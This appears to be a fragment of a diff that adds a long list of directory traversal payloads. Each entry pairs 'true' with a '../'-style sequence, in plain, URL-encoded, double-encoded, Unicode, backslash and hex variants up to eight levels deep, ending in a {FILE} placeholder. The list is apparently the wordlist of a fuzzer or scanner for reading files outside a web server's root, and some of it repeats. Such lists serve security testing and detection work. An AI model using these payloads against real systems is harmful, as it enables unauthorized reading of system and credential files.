+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,\\../{FILE}",
+ "true,\\../\\../{FILE}",
+ "true,\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,/..\\{FILE}",
+ "true,/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,.../{FILE}",
+ "true,.../.../{FILE}",
+ "true,.../.../.../{FILE}",
+ "true,.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../.../{FILE}",
+ "true,...\\{FILE}",
+ "true,...\\...\\{FILE}",
+ "true,...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,..../{FILE}",
+ "true,..../..../{FILE}",
+ "true,..../..../..../{FILE}",
+ "true,..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../..../{FILE}",
+ "true,....\\{FILE}",
+ "true,....\\....\\{FILE}",
+ "true,....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,........................................................................../{FILE}",
+ "true,........................................................................../../{FILE}",
+ "true,........................................................................../../../{FILE}",
+ "true,........................................................................../../../../{FILE}",
+ "true,........................................................................../../../../../{FILE}",
+ "true,........................................................................../../../../../../{FILE}",
+ "true,........................................................................../../../../../../../{FILE}",
+ "true,........................................................................../../../../../../../../{FILE}",
+ "true,..........................................................................\\{FILE}",
+ "true,..........................................................................\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%u2215{FILE}",
+ "true,..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,..%u2216{FILE}",
+ "true,..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uF025{FILE}",
+ "true,..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,..0x2f{FILE}",
+ "true,..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
